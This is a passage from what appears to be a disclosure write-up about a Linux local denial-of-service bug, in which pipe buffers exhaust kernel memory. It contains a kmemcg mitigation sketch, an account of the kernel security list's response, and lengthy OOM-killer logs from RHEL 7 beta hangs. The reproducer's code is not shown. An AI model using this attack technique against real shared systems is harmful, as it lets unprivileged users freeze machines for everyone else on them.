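For reference, a minimal sketch of configuring kmemcg, analogous to the memory.limit_in_bytes sketch earlier. Under cgroup v1 the knob is memory.kmem.limit_in_bytes; the mount point and group name are again assumptions, and on many kernels this knob can only be written while the group is still empty.
---------- kmemcg-limit.c (illustrative sketch) ----------
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>

int main(void)
{
	FILE *fp;
	mkdir("/sys/fs/cgroup/memory/sandbox", 0755);
	/* Limit kernel memory (pipe buffers etc.) to 64MB; on many
	   kernels this must be written while the group is empty. */
	fp = fopen("/sys/fs/cgroup/memory/sandbox/memory.kmem.limit_in_bytes",
		   "w");
	if (!fp)
		return 1;
	fprintf(fp, "%lu\n", 64UL * 1048576);
	fclose(fp);
	/* Then move the untrusted user's session into the group. */
	fp = fopen("/sys/fs/cgroup/memory/sandbox/tasks", "w");
	if (!fp)
		return 1;
	fprintf(fp, "%u\n", (unsigned int) getpid());
	fclose(fp);
	return 0;
}
---------- kmemcg-limit.c (illustrative sketch) ----------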
Discussions took place on a closed mailing list for handling vulnerabilities (security@kernel.org). But this vulnerability was judged "not worth addressing seriously".
·In the first place, allowing untrusted local users to log in is the administrator's fault.
→ While privilege escalation bugs exploitable by local users are addressed immediately, why aren't local DoS attacks exploitable by local users addressed immediately as well?
·We can mitigate by configuring kmemcg (in the memory cgroup) appropriately.
→ Can we really configure kmemcg appropriately in the first place? And why abandon administrators using older kernels which do not support kmemcg?
·There are other ways to attack anyway.
→ Since I have experience with access control modules such as CaitSith, I proposed an LSM module which restricts the available file descriptors based on conditions like user ID and/or group ID. But that module was not accepted, because it was judged "too grandiose a change for addressing this problem".
Therefore, the situation continued without any solution.
Meanwhile, RHEL 7 beta was released in December 2013.
systemd was introduced, and many procedures such as starting/stopping daemon processes were put under the control of systemd. Also, while the default filesystem for RHEL 6 was ext4, the default filesystem for RHEL 7 became xfs.
"I was able to terminate almost all daemon processes in RHEL6. Does the same thing happen in RHEL7?"
and I tried using RHEL 7 beta with GUI environment installed. However ···
Something was wrong when running the reproducer program on RHEL 7 beta.
I expected that almost all processes would be killed by the OOM killer. But in fact, the whole system sometimes froze before or after the OOM killer was invoked.
---------- Example output of a hang up before OOM killer is invoked start ---------- ( I pressed SysRq-m in order to display memory information, for the system was not responding for 1 minute after pipe-memeater2 was started. ) [ 143.112366] SysRq : Show Memory [ 143.114964] Mem-Info: [ 143.116515] Node 0 DMA per-cpu: [ 143.118718] CPU 0: hi: 0, btch: 1 usd: 0 [ 143.121888] CPU 1: hi: 0, btch: 1 usd: 0 [ 143.125057] CPU 2: hi: 0, btch: 1 usd: 0 [ 143.128223] CPU 3: hi: 0, btch: 1 usd: 0 [ 143.131423] Node 0 DMA32 per-cpu: [ 143.133751] CPU 0: hi: 186, btch: 31 usd: 0 [ 143.136898] CPU 1: hi: 186, btch: 31 usd: 0 [ 143.140448] CPU 2: hi: 186, btch: 31 usd: 0 [ 143.141648] CPU 3: hi: 186, btch: 31 usd: 0 [ 143.142848] active_anon:94430 inactive_anon:2419 isolated_anon:0 [ 143.142848] active_file:25 inactive_file:27 isolated_file:46 [ 143.142848] unevictable:0 dirty:25 writeback:0 unstable:0 [ 143.142848] free:13044 slab_reclaimable:5548 slab_unreclaimable:8850 [ 143.142848] mapped:856 shmem:2589 pagetables:5786 bounce:0 [ 143.142848] free_cma:0 [ 143.150637] Node 0 DMA free:7568kB min:384kB low:480kB high:576kB active_anon:3188kB inactive_anon:112kB active_file:0kB inactive_file:24kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:16kB shmem:124kB slab_reclaimable:144kB slab_unreclaimable:300kB kernel_stack:16kB pagetables:248kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 143.160561] lowmem_reserve[]: 0 1802 1802 1802 [ 143.161866] Node 0 DMA32 free:44608kB min:44668kB low:55832kB high:67000kB active_anon:374532kB inactive_anon:9564kB active_file:100kB inactive_file:84kB unevictable:0kB isolated(anon):0kB isolated(file):184kB present:2080640kB managed:1845300kB mlocked:0kB dirty:100kB writeback:0kB mapped:3408kB shmem:10232kB slab_reclaimable:22048kB slab_unreclaimable:35100kB kernel_stack:5296kB pagetables:22896kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 143.172186] lowmem_reserve[]: 0 0 0 0 [ 143.172895] Node 0 DMA: 50*4kB (UM) 46*8kB (M) 30*16kB (M) 18*32kB (M) 11*64kB (UM) 5*128kB (UM) 0*256kB 1*512kB (U) 0*1024kB 2*2048kB (MR) 0*4096kB = 7576kB [ 143.175751] Node 0 DMA32: 3297*4kB (UEM) 1562*8kB (UEM) 647*16kB (UEM) 135*32kB (UEM) 4*64kB (UEM) 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 1*4096kB (R) = 44708kB [ 143.178506] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 143.180035] 2666 total pagecache pages [ 143.180639] 0 pages in swap cache [ 143.181175] Swap cache stats: add 0, delete 0, find 0/0 [ 143.182004] Free swap = 0kB [ 143.182471] Total swap = 0kB [ 143.185995] 524287 pages RAM [ 143.186492] 54799 pages reserved [ 143.187047] 527642 pages shared [ 143.187555] 453340 pages non-shared ( I pressed SysRq-f in order to invoke OOM killer, for OOM killer is not invoked automatically despite DMA32's free: is already below min: watermark. ) [ 160.509185] SysRq : Manual OOM execution [ 160.512561] kworker/0:2 invoked oom-killer: gfp_mask=0xd0, order=0, oom_score_adj=0 [ 160.517679] kworker/0:2 cpuset=/ mems_allowed=0 [ 160.520700] CPU: 0 PID: 185 Comm: kworker/0:2 Not tainted 3.10.0-123.el7.x86_64 #1 [ 160.525619] Hardware name: VMware, Inc. 
VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013 [ 160.532031] Workqueue: events moom_callback [ 160.533408] ffff880036c24fa0 000000007dd3d9cb ffff880036dd1c70 ffffffff815e19ba [ 160.535875] ffff880036dd1d00 ffffffff815dd02d ffff88005f108bf0 ffff88005f108bf0 [ 160.538324] ffff88007f674580 ffff88007f674ea8 ffff880036dd1d98 0000000000000046 [ 160.540795] Call Trace: [ 160.541572] [<ffffffff815e19ba>] dump_stack+0x19/0x1b [ 160.543176] [<ffffffff815dd02d>] dump_header+0x8e/0x214 [ 160.544824] [<ffffffff8114520e>] oom_kill_process+0x24e/0x3b0 [ 160.546618] [<ffffffff81144d76>] ? find_lock_task_mm+0x56/0xc0 [ 160.548444] [<ffffffff8106af3e>] ? has_capability_noaudit+0x1e/0x30 [ 160.550420] [<ffffffff81145a36>] out_of_memory+0x4b6/0x4f0 [ 160.552152] [<ffffffff8137bc3d>] moom_callback+0x4d/0x50 [ 160.553828] [<ffffffff8107e02b>] process_one_work+0x17b/0x460 [ 160.555643] [<ffffffff8107edfb>] worker_thread+0x11b/0x400 [ 160.557365] [<ffffffff8107ece0>] ? rescuer_thread+0x400/0x400 [ 160.559215] [<ffffffff81085aef>] kthread+0xcf/0xe0 [ 160.560758] [<ffffffff81085a20>] ? kthread_create_on_node+0x140/0x140 [ 160.562806] [<ffffffff815f206c>] ret_from_fork+0x7c/0xb0 [ 160.563824] [<ffffffff81085a20>] ? kthread_create_on_node+0x140/0x140 [ 160.564921] Mem-Info: [ 160.565325] Node 0 DMA per-cpu: [ 160.565860] CPU 0: hi: 0, btch: 1 usd: 0 [ 160.566631] CPU 1: hi: 0, btch: 1 usd: 0 [ 160.567617] CPU 2: hi: 0, btch: 1 usd: 0 [ 160.568414] CPU 3: hi: 0, btch: 1 usd: 0 [ 160.569198] Node 0 DMA32 per-cpu: [ 160.569771] CPU 0: hi: 186, btch: 31 usd: 0 [ 160.570542] CPU 1: hi: 186, btch: 31 usd: 0 [ 160.571392] CPU 2: hi: 186, btch: 31 usd: 0 [ 160.572164] CPU 3: hi: 186, btch: 31 usd: 0 [ 160.572948] active_anon:94430 inactive_anon:2419 isolated_anon:0 [ 160.572948] active_file:25 inactive_file:27 isolated_file:46 [ 160.572948] unevictable:0 dirty:25 writeback:0 unstable:0 [ 160.572948] free:13044 slab_reclaimable:5548 slab_unreclaimable:8850 [ 160.572948] mapped:856 shmem:2589 pagetables:5786 bounce:0 [ 160.572948] free_cma:0 [ 160.578891] Node 0 DMA free:7568kB min:384kB low:480kB high:576kB active_anon:3188kB inactive_anon:112kB active_file:0kB inactive_file:24kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:16kB shmem:124kB slab_reclaimable:144kB slab_unreclaimable:300kB kernel_stack:16kB pagetables:248kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 160.585529] lowmem_reserve[]: 0 1802 1802 1802 [ 160.586429] Node 0 DMA32 free:44608kB min:44668kB low:55832kB high:67000kB active_anon:374532kB inactive_anon:9564kB active_file:100kB inactive_file:84kB unevictable:0kB isolated(anon):0kB isolated(file):184kB present:2080640kB managed:1845300kB mlocked:0kB dirty:100kB writeback:0kB mapped:3408kB shmem:10232kB slab_reclaimable:22048kB slab_unreclaimable:35100kB kernel_stack:5296kB pagetables:22896kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? 
no [ 160.593312] lowmem_reserve[]: 0 0 0 0 [ 160.594029] Node 0 DMA: 50*4kB (UM) 46*8kB (M) 30*16kB (M) 18*32kB (M) 11*64kB (UM) 5*128kB (UM) 0*256kB 1*512kB (U) 0*1024kB 2*2048kB (MR) 0*4096kB = 7576kB [ 160.596790] Node 0 DMA32: 3297*4kB (UEM) 1562*8kB (UEM) 647*16kB (UEM) 135*32kB (UEM) 4*64kB (UEM) 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 1*4096kB (R) = 44708kB [ 160.599652] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 160.601103] 2666 total pagecache pages [ 160.601703] 0 pages in swap cache [ 160.602691] Swap cache stats: add 0, delete 0, find 0/0 [ 160.603580] Free swap = 0kB [ 160.604072] Total swap = 0kB [ 160.607456] 524287 pages RAM [ 160.607980] 54799 pages reserved [ 160.608499] 527635 pages shared [ 160.609024] 453340 pages non-shared [ 160.609599] [ pid ] uid tgid total_vm rss nr_ptes swapents oom_score_adj name [ 160.610967] [ 572] 0 572 9232 522 19 0 0 systemd-journal [ 160.612373] [ 591] 0 591 29620 80 25 0 0 lvmetad [ 160.613750] [ 613] 0 613 11094 414 22 0 -1000 systemd-udevd [ 160.615158] [ 707] 0 707 12803 102 24 0 -1000 auditd [ 160.616465] [ 720] 0 720 20056 16 9 0 0 audispd [ 160.618066] [ 729] 0 729 4189 43 13 0 0 alsactl [ 160.619369] [ 730] 0 730 6551 49 18 0 0 sedispatch [ 160.620697] [ 732] 172 732 41164 55 16 0 0 rtkit-daemon [ 160.622183] [ 734] 0 734 6612 86 16 0 0 systemd-logind [ 160.623558] [ 735] 0 735 61592 373 63 0 0 vmtoolsd [ 160.624863] [ 739] 0 739 80894 4240 77 0 0 firewalld [ 160.626244] [ 745] 995 745 2133 36 9 0 0 lsmd [ 160.627506] [ 746] 0 746 96840 194 40 0 0 accounts-daemon [ 160.628884] [ 747] 0 747 84088 287 66 0 0 ModemManager [ 160.630335] [ 749] 0 749 32515 128 19 0 0 smartd [ 160.631591] [ 752] 994 752 28961 92 28 0 0 chronyd [ 160.632883] [ 756] 0 756 71323 513 39 0 0 rsyslogd [ 160.634400] [ 757] 0 757 52615 443 53 0 0 abrtd [ 160.635671] [ 759] 0 759 51993 340 54 0 0 abrt-watch-log [ 160.637062] [ 760] 32 760 16227 131 35 0 0 rpcbind [ 160.638471] [ 763] 0 763 51993 341 50 0 0 abrt-watch-log [ 160.639847] [ 766] 0 766 1094 23 8 0 0 rngd [ 160.641159] [ 768] 0 768 4829 78 14 0 0 irqbalance [ 160.642469] [ 770] 81 770 7580 425 19 0 -900 dbus-daemon [ 160.643811] [ 777] 0 777 50842 115 39 0 0 gssproxy [ 160.645177] [ 807] 70 807 7549 77 20 0 0 avahi-daemon [ 160.646534] [ 815] 0 815 28811 58 11 0 0 ksmtuned [ 160.647818] [ 816] 0 816 26974 22 10 0 0 sleep [ 160.649127] [ 817] 999 817 132837 2083 57 0 0 polkitd [ 160.650499] [ 818] 70 818 7518 60 18 0 0 avahi-daemon [ 160.651906] [ 880] 0 880 113613 994 74 0 0 NetworkManager [ 160.653405] [ 1077] 0 1077 13266 145 28 0 0 wpa_supplicant [ 160.654788] [ 1198] 0 1198 27631 3113 56 0 0 dhclient [ 160.656100] [ 1408] 0 1408 138261 2652 87 0 0 tuned [ 160.657411] [ 1409] 0 1409 20640 213 42 0 -1000 sshd [ 160.658661] [ 1416] 0 1416 138875 1130 141 0 0 libvirtd [ 160.659944] [ 1422] 0 1422 31583 150 18 0 0 crond [ 160.661296] [ 1423] 0 1423 6491 49 16 0 0 atd [ 160.662511] [ 1424] 0 1424 118308 759 51 0 0 gdm [ 160.663729] [ 1427] 0 1427 27509 31 11 0 0 agetty [ 160.665053] [ 2285] 0 2285 61020 4487 104 0 0 Xorg [ 160.666283] [ 2567] 0 2567 23306 253 44 0 0 master [ 160.667674] [ 2568] 89 2568 23332 252 45 0 0 pickup [ 160.669045] [ 2569] 89 2569 23349 251 45 0 0 qmgr [ 160.670312] [ 2580] 0 2580 64751 993 57 0 -900 abrt-dbus [ 160.671620] [ 2707] 99 2707 3888 48 11 0 0 dnsmasq [ 160.672985] [ 2708] 0 2708 3881 45 10 0 0 dnsmasq [ 160.674256] [ 2746] 0 2746 90874 322 61 0 0 upowerd [ 160.675546] [ 2770] 997 2770 101041 371 50 0 0 colord [ 160.676902] [ 
2778] 42 2778 111507 299 75 0 0 pulseaudio [ 160.678231] [ 2791] 0 2791 4975 48 14 0 0 systemd-localed [ 160.679607] [ 2828] 0 2828 101278 258 47 0 0 packagekitd [ 160.681005] [ 2870] 0 2870 92702 783 45 0 0 udisksd [ 160.682294] [ 2913] 0 2913 80155 235 56 0 -900 realmd [ 160.683551] [ 2976] 0 2976 93324 821 70 0 0 gdm-session-wor [ 160.685488] [ 2992] 1000 2992 97458 200 40 0 0 gnome-keyring-d [ 160.687246] [ 3034] 1000 3034 162279 508 112 0 0 gnome-session [ 160.688795] [ 3041] 1000 3041 3488 36 10 0 0 dbus-launch [ 160.690170] [ 3042] 1000 3042 7460 298 17 0 0 dbus-daemon [ 160.691540] [ 3106] 1000 3106 76642 165 36 0 0 gvfsd [ 160.692986] [ 3110] 1000 3110 90285 685 44 0 0 gvfsd-fuse [ 160.694345] [ 3178] 1000 3178 13216 144 26 0 0 ssh-agent [ 160.695703] [ 3194] 1000 3194 84999 151 34 0 0 at-spi-bus-laun [ 160.697166] [ 3198] 1000 3198 7171 108 18 0 0 dbus-daemon [ 160.698535] [ 3201] 1000 3201 32423 159 32 0 0 at-spi2-registr [ 160.700025] [ 3213] 1000 3213 308215 2987 217 0 0 gnome-settings- [ 160.701605] [ 3230] 1000 3230 119864 373 93 0 0 pulseaudio [ 160.702984] [ 3236] 0 3236 9863 91 23 0 0 bluetoothd [ 160.704616] [ 3248] 0 3248 4972 49 13 0 0 systemd-hostnam [ 160.706041] [ 3250] 1000 3250 399482 27809 312 0 0 gnome-shell [ 160.707405] [ 3263] 0 3263 47748 273 47 0 0 cupsd [ 160.708758] [ 3287] 1000 3287 129195 382 96 0 0 gsd-printer [ 160.710124] [ 3317] 1000 3317 117500 523 49 0 0 ibus-daemon [ 160.711601] [ 3322] 1000 3322 98216 174 44 0 0 ibus-dconf [ 160.713041] [ 3324] 1000 3324 113063 487 104 0 0 ibus-x11 [ 160.714394] [ 3329] 1000 3329 132651 1039 79 0 0 gnome-shell-cal [ 160.715891] [ 3337] 1000 3337 80472 397 57 0 0 mission-control [ 160.717428] [ 3341] 1000 3341 143879 597 92 0 0 caribou [ 160.718742] [ 3343] 1000 3343 178351 1094 144 0 0 goa-daemon [ 160.720151] [ 3358] 1000 3358 83626 372 90 0 0 goa-identity-se [ 160.721577] [ 3382] 1000 3382 100148 245 48 0 0 gvfs-udisks2-vo [ 160.723002] [ 3393] 1000 3393 105443 809 54 0 0 gvfs-afc-volume [ 160.724476] [ 3399] 1000 3399 167235 855 154 0 0 evolution-sourc [ 160.725990] [ 3406] 1000 3406 78121 167 37 0 0 gvfs-mtp-volume [ 160.727476] [ 3412] 1000 3412 74935 139 33 0 0 gvfs-goa-volume [ 160.728902] [ 3419] 1000 3419 80390 181 44 0 0 gvfs-gphoto2-vo [ 160.730326] [ 3435] 1000 3435 215425 2108 157 0 0 nautilus [ 160.731786] [ 3446] 1000 3446 182851 1697 136 0 0 tracker-extract [ 160.733214] [ 3447] 1000 3447 94351 915 125 0 0 vmtoolsd [ 160.734650] [ 3448] 1000 3448 117460 674 74 0 0 tracker-miner-a [ 160.736095] [ 3449] 1000 3449 117430 623 75 0 0 tracker-miner-u [ 160.737520] [ 3451] 1000 3451 140588 1248 82 0 0 tracker-miner-f [ 160.739047] [ 3460] 1000 3460 134177 1162 66 0 0 tracker-store [ 160.740605] [ 3462] 1000 3462 112871 1244 135 0 0 abrt-applet [ 160.741951] [ 3550] 1000 3550 37459 108 31 0 0 gconfd-2 [ 160.743318] [ 3565] 1000 3565 79800 168 42 0 0 ibus-engine-sim [ 160.744710] [ 3587] 1000 3587 117863 187 47 0 0 gvfsd-trash [ 160.746059] [ 3624] 1000 3624 267938 9317 185 0 0 evolution-calen [ 160.747531] [ 3630] 1000 3630 59682 143 38 0 0 gvfsd-metadata [ 160.748929] [ 3649] 1000 3649 138689 1816 121 0 0 gnome-terminal- [ 160.750307] [ 3652] 1000 3652 2122 32 9 0 0 gnome-pty-helpe [ 160.751902] [ 3653] 1000 3653 29140 406 14 0 0 bash [ 160.753144] [ 3695] 1000 3695 1042 21 7 0 1 pipe-memeater2 [ 160.754680] [ 3696] 1000 3696 1042 21 7 0 1 pipe-memeater2 [ 160.756054] [ 3697] 1000 3697 1042 21 7 0 1 pipe-memeater2 [ 160.757442] [ 3698] 1000 3698 1042 21 7 0 1 pipe-memeater2 [ 160.758876] [ 3699] 1000 
3699 1042 21 7 0 1 pipe-memeater2 [ 160.760282] [ 3700] 1000 3700 1042 21 7 0 1 pipe-memeater2 [ 160.761678] [ 3701] 1000 3701 1042 21 7 0 1 pipe-memeater2 [ 160.763303] [ 3702] 1000 3702 1042 21 7 0 1 pipe-memeater2 [ 160.764761] [ 3703] 1000 3703 1042 21 7 0 1 pipe-memeater2 [ 160.766153] [ 3704] 1000 3704 1042 21 7 0 1 pipe-memeater2 [ 160.767683] [ 3706] 1000 3706 1042 21 7 0 0 pipe-memeater2 [ 160.769049] Out of memory: Kill process 3250 (gnome-shell) score 59 or sacrifice child [ 160.770424] Killed process 3317 (ibus-daemon) total-vm:470000kB, anon-rss:2092kB, file-rss:0kB ( I pressed SysRq-m in order to display memory information, for the system was still not responding. ) [ 196.095694] SysRq : Show Memory [ 196.098000] Mem-Info: [ 196.099641] Node 0 DMA per-cpu: [ 196.101846] CPU 0: hi: 0, btch: 1 usd: 0 [ 196.105035] CPU 1: hi: 0, btch: 1 usd: 0 [ 196.109063] CPU 2: hi: 0, btch: 1 usd: 0 [ 196.112459] CPU 3: hi: 0, btch: 1 usd: 0 [ 196.115794] Node 0 DMA32 per-cpu: [ 196.118128] CPU 0: hi: 186, btch: 31 usd: 0 [ 196.121276] CPU 1: hi: 186, btch: 31 usd: 0 [ 196.124455] CPU 2: hi: 186, btch: 31 usd: 0 [ 196.126846] CPU 3: hi: 186, btch: 31 usd: 0 [ 196.128674] active_anon:94430 inactive_anon:2419 isolated_anon:0 [ 196.128674] active_file:25 inactive_file:27 isolated_file:46 [ 196.128674] unevictable:0 dirty:25 writeback:0 unstable:0 [ 196.128674] free:13046 slab_reclaimable:5548 slab_unreclaimable:8850 [ 196.128674] mapped:856 shmem:2589 pagetables:5786 bounce:0 [ 196.128674] free_cma:0 [ 196.140606] Node 0 DMA free:7568kB min:384kB low:480kB high:576kB active_anon:3188kB inactive_anon:112kB active_file:0kB inactive_file:24kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:16kB shmem:124kB slab_reclaimable:144kB slab_unreclaimable:300kB kernel_stack:16kB pagetables:248kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 196.155788] lowmem_reserve[]: 0 1802 1802 1802 [ 196.157371] Node 0 DMA32 free:44616kB min:44668kB low:55832kB high:67000kB active_anon:374532kB inactive_anon:9564kB active_file:100kB inactive_file:84kB unevictable:0kB isolated(anon):0kB isolated(file):184kB present:2080640kB managed:1845300kB mlocked:0kB dirty:100kB writeback:0kB mapped:3408kB shmem:10232kB slab_reclaimable:22048kB slab_unreclaimable:35100kB kernel_stack:5288kB pagetables:22896kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 196.164536] lowmem_reserve[]: 0 0 0 0 [ 196.165466] Node 0 DMA: 50*4kB (UM) 46*8kB (M) 30*16kB (M) 18*32kB (M) 11*64kB (UM) 5*128kB (UM) 0*256kB 1*512kB (U) 0*1024kB 2*2048kB (MR) 0*4096kB = 7576kB [ 196.168336] Node 0 DMA32: 3297*4kB (UEM) 1564*8kB (UEM) 647*16kB (UEM) 135*32kB (UEM) 4*64kB (UEM) 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 1*4096kB (R) = 44724kB [ 196.171141] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 196.172490] 2666 total pagecache pages [ 196.173179] 0 pages in swap cache [ 196.173715] Swap cache stats: add 0, delete 0, find 0/0 [ 196.174547] Free swap = 0kB [ 196.175015] Total swap = 0kB [ 196.178556] 524287 pages RAM [ 196.179082] 54799 pages reserved [ 196.179605] 527628 pages shared [ 196.180114] 453338 pages non-shared ( I pressed SysRq-b in order to reboot the system, for OOM killer is not invoked automatically despite DMA32's free: is still below min: watermark. 
) [ 208.678839] SysRq : Resetting ---------- Example output of a hang up before OOM killer is invoked end ----------
---------- Example output of a hang up after OOM killer is invoked start ---------- ( I pressed SysRq-m in order to display memory information before I start pipe-memeater2. ) [ 75.434294] SysRq : Show Memory [ 75.436621] Mem-Info: [ 75.438188] Node 0 DMA per-cpu: [ 75.440491] CPU 0: hi: 0, btch: 1 usd: 0 [ 75.443676] CPU 1: hi: 0, btch: 1 usd: 0 [ 75.446920] CPU 2: hi: 0, btch: 1 usd: 0 [ 75.450100] CPU 3: hi: 0, btch: 1 usd: 0 [ 75.453282] Node 0 DMA32 per-cpu: [ 75.455657] CPU 0: hi: 186, btch: 31 usd: 149 [ 75.458830] CPU 1: hi: 186, btch: 31 usd: 159 [ 75.461469] CPU 2: hi: 186, btch: 31 usd: 139 [ 75.462882] CPU 3: hi: 186, btch: 31 usd: 90 [ 75.464299] active_anon:54015 inactive_anon:2094 isolated_anon:0 [ 75.464299] active_file:7055 inactive_file:58983 isolated_file:0 [ 75.464299] unevictable:0 dirty:8 writeback:0 unstable:0 [ 75.464299] free:311926 slab_reclaimable:6382 slab_unreclaimable:7573 [ 75.464299] mapped:21931 shmem:2263 pagetables:3993 bounce:0 [ 75.464299] free_cma:0 [ 75.473555] Node 0 DMA free:9484kB min:384kB low:480kB high:576kB active_anon:2192kB inactive_anon:104kB active_file:160kB inactive_file:2540kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:672kB shmem:124kB slab_reclaimable:232kB slab_unreclaimable:456kB kernel_stack:56kB pagetables:108kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 75.485351] lowmem_reserve[]: 0 1802 1802 1802 [ 75.486883] Node 0 DMA32 free:1238220kB min:44668kB low:55832kB high:67000kB active_anon:213868kB inactive_anon:8272kB active_file:28060kB inactive_file:233392kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1845300kB mlocked:0kB dirty:32kB writeback:0kB mapped:87052kB shmem:8928kB slab_reclaimable:25296kB slab_unreclaimable:29836kB kernel_stack:4408kB pagetables:15864kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 75.496482] lowmem_reserve[]: 0 0 0 0 [ 75.497196] Node 0 DMA: 5*4kB (UM) 3*8kB (UE) 2*16kB (EM) 2*32kB (UM) 2*64kB (UM) 2*128kB (M) 3*256kB (UEM) 2*512kB (EM) 1*1024kB (E) 3*2048kB (EMR) 0*4096kB = 9484kB [ 75.500108] Node 0 DMA32: 141*4kB (UEM) 116*8kB (UEM) 39*16kB (UEM) 18*32kB (UEM) 10*64kB (M) 10*128kB (UM) 7*256kB (UM) 8*512kB (UM) 7*1024kB (EM) 4*2048kB (UEM) 296*4096kB (MR) = 1238276kB [ 75.503370] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 75.504729] 68301 total pagecache pages [ 75.505351] 0 pages in swap cache [ 75.505903] Swap cache stats: add 0, delete 0, find 0/0 [ 75.506758] Free swap = 0kB [ 75.507230] Total swap = 0kB [ 75.511170] 524287 pages RAM [ 75.511675] 54799 pages reserved [ 75.512203] 600924 pages shared [ 75.512738] 132132 pages non-shared ( I started pipe-memeater2 here. ) [ 78.806223] pipe-memeater2 invoked oom-killer: gfp_mask=0x200d2, order=0, oom_score_adj=0 [ 78.811173] pipe-memeater2 cpuset=/ mems_allowed=0 [ 78.814287] CPU: 0 PID: 3088 Comm: pipe-memeater2 Not tainted 3.10.0-123.el7.x86_64 #1 [ 78.818717] Hardware name: VMware, Inc. 
VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013 [ 78.821857] ffff88005f302d80 000000005d69c4df ffff88005f3ada78 ffffffff815e19ba [ 78.824265] ffff88005f3adb08 ffffffff815dd02d ffffffff810b68f8 ffff8800666dde50 [ 78.826634] 0000000000000206 ffff88005f302d80 ffff88005f3adaf0 ffffffff81102eff [ 78.829363] Call Trace: [ 78.830134] [<ffffffff815e19ba>] dump_stack+0x19/0x1b [ 78.831676] [<ffffffff815dd02d>] dump_header+0x8e/0x214 [ 78.833289] [<ffffffff810b68f8>] ? ktime_get_ts+0x48/0xe0 [ 78.834899] [<ffffffff81102eff>] ? delayacct_end+0x8f/0xb0 [ 78.836528] [<ffffffff8114520e>] oom_kill_process+0x24e/0x3b0 [ 78.838236] [<ffffffff81144d76>] ? find_lock_task_mm+0x56/0xc0 [ 78.839990] [<ffffffff8106af3e>] ? has_capability_noaudit+0x1e/0x30 [ 78.841859] [<ffffffff81145a36>] out_of_memory+0x4b6/0x4f0 [ 78.843493] [<ffffffff8114b579>] __alloc_pages_nodemask+0xa09/0xb10 [ 78.845350] [<ffffffff81188779>] alloc_pages_current+0xa9/0x170 [ 78.847179] [<ffffffff811b8954>] pipe_write+0x274/0x540 [ 78.848826] [<ffffffff811af36d>] do_sync_write+0x8d/0xd0 [ 78.849928] [<ffffffff811afb0d>] vfs_write+0xbd/0x1e0 [ 78.850887] [<ffffffff811b0558>] SyS_write+0x58/0xb0 [ 78.851837] [<ffffffff815f2119>] system_call_fastpath+0x16/0x1b [ 78.852928] Mem-Info: [ 78.853402] Node 0 DMA per-cpu: [ 78.854021] CPU 0: hi: 0, btch: 1 usd: 0 [ 78.854911] CPU 1: hi: 0, btch: 1 usd: 0 [ 78.855790] CPU 2: hi: 0, btch: 1 usd: 0 [ 78.856674] CPU 3: hi: 0, btch: 1 usd: 0 [ 78.857558] Node 0 DMA32 per-cpu: [ 78.858201] CPU 0: hi: 186, btch: 31 usd: 52 [ 78.859080] CPU 1: hi: 186, btch: 31 usd: 165 [ 78.859963] CPU 2: hi: 186, btch: 31 usd: 46 [ 78.860848] CPU 3: hi: 186, btch: 31 usd: 182 [ 78.861729] active_anon:54067 inactive_anon:2094 isolated_anon:0 [ 78.861729] active_file:15 inactive_file:114 isolated_file:0 [ 78.861729] unevictable:0 dirty:0 writeback:0 unstable:0 [ 78.861729] free:13039 slab_reclaimable:5278 slab_unreclaimable:7941 [ 78.861729] mapped:494 shmem:2263 pagetables:4022 bounce:0 [ 78.861729] free_cma:0 [ 78.867365] Node 0 DMA free:7568kB min:384kB low:480kB high:576kB active_anon:2192kB inactive_anon:104kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:124kB slab_reclaimable:168kB slab_unreclaimable:440kB kernel_stack:56kB pagetables:108kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes [ 78.874584] lowmem_reserve[]: 0 1802 1802 1802 [ 78.875538] Node 0 DMA32 free:44588kB min:44668kB low:55832kB high:67000kB active_anon:214076kB inactive_anon:8272kB active_file:60kB inactive_file:456kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1845300kB mlocked:0kB dirty:0kB writeback:0kB mapped:1976kB shmem:8928kB slab_reclaimable:20944kB slab_unreclaimable:31324kB kernel_stack:4472kB pagetables:15980kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:1254 all_unreclaimable? 
